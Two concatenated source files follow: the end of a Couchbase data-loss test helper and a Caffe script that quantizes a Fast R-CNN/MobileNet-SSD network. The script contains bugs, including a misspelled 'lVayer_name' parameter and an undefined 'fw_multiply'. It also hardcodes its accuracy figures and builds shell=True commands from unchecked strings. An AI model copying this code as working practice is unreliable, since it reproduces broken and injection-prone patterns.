total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, items,
"Failed to load {} items. Loaded only {} items".format(
items,
total_loaded))
def check_dataloss_for_high_ops_loader(self, server, bucket, items,
batch=20000, threads=5,
start_document=0,
updated=False, ops=0, ttl=0, deleted=False, deleted_items=0):
import subprocess
from lib.memcached.helper.data_helper import VBucketAwareMemcached
cmd_format = "python3 scripts/high_ops_doc_gen.py --node {0} --bucket {1} --user {2} --password {3} " \
"--count {4} " \
"--batch_size {5} --threads {6} --start_document {7} --cb_version {8} --validate"
cb_version = RestConnection(server).get_nodes_version()[:3]
if updated:
cmd_format = "{} --updated --ops {}".format(cmd_format, ops)
if deleted:
cmd_format = "{} --deleted --deleted_items {}".format(cmd_format, deleted_items)
if ttl > 0:
cmd_format = "{} --ttl {}".format(cmd_format, ttl)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
int(items), batch, threads, start_document, cb_version)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
errors = []
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
if error:
self.log.error(error)
self.fail("Failed to run the loadgen validator.")
if output:
loaded = output.split('\n')[:-1]
for load in loaded:
if "Missing keys:" in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append(
("Missing key: {0}, VBucketId: {1}".format(key, vBucketId)))
if "Mismatch keys: " in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append((
"Wrong value for key: {0}, VBucketId: {1}".format(
key, vBucketId)))
return errors
|
quantize_mobilenet-ssd3_test.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
from subprocess import check_output
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
def change_layer_BAC_bw(net_proto, lVayer_name,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.bw_add = bw_add
l.quantization_param.fl_add = fl_add
l.quantization_param.bw_multiply = bw_multiply
l.quantization_param.fl_multiply = fw_multiply
return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
percentile = 0
layer_param = net.params[layer.name]
#max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
weight_sorted = np.sort(layer_param[0].data[...], axis=None)
max_weight = max(weight_sorted[int(len(weight_sorted)*percentile)], weight_sorted[-1*int(len(weight_sorted)*percentile)-1],key=abs)
if layer.convolution_param.bias_term:
bias_sorted = np.sort(layer_param[1].data[...], axis=None)
max_bias = max(bias_sorted[int(len(bias_sorted)*percentile)], bias_sorted[-1*int(len(bias_sorted)*percentile)-1],key=abs)
#max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
else:
max_bias = 0
#print layer.name, max_weight, max(weight_sorted[0],weight_sorted[-1],key=abs), max(weight_sorted[int(len(weight_sorted)/100)], weight_sorted[-1*int(len(weight_sorted)/100)],key=abs)
max_param = max(max_weight, max_bias, key=abs)
return math.ceil(math.log(abs(max_param), 2)) + 1
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def analyze_net_output_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
#print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
net_adder_IL[layer.name] = -sys.maxint - 1
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward(start=layer.name, end=layer.name)
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
input_bw = output_bw;
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
fn = ori_net_path;
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
with open(outf, 'w') as f:
f.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
print dir(layer)
print layer.reshape
print layer.convolution_param
print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
#cfg.GPU_ID = GPU_ID
#caffe.set_device(GPU_ID)
#caffe.set_mode_gpu()
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
ap = float(check_output('./caffe-fast-rcnn/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True))
#ap = test_qnet(net_path, args.caffemodel, imdb)
#ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
args = parse_args()
num_iters = 4952
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
print 'Create quantized prototxt'
print 'Testing Full Precision Accuracy'
manager = multiprocessing.Manager()
shared_dict = manager.dict()
GPU1 = 1
GPU2 = 1
#p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
timer = Timer()
timer.tic()
#p.start()
#p.join()
timer.toc()
print ('Took {:.3f}s').format(timer.total_time)
#full_ap = shared_dict['FP-FP-FP-FP-FP']
full_ap = 0.725401
print 'Full precision accuracy : {}'.format(full_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 8 #just initial
bw_deconv = 0 #just initial
bw_fc = 0 #just initial
bw_output = 8 #just initial
bw_adder = 12 #just initial
bw_multiplier = 10 #just initial
convIL_reduction = 0
deconvIL_reduction = 0
fcIL_reduction = 0
actIL_reduction = -1
adderIL_reduction = 0
multIL_reduction = 0
#Make Final Quantized Prototxt
print 'Final Quantization Testing'
net_proto = read_from_prototxt(args.prototxt_quantized)
write_to_prototxt(net_proto, './temp.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
shared_dict, GPU1))
#p.start()
#p.join()
#ap = shared_dict['DQ-DQ-DQ-32-32']
ap = 0.695373
layer_ap = ap
#ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print 'Please fine-tune'
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis2.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
sys.exit(0)
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
break;
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
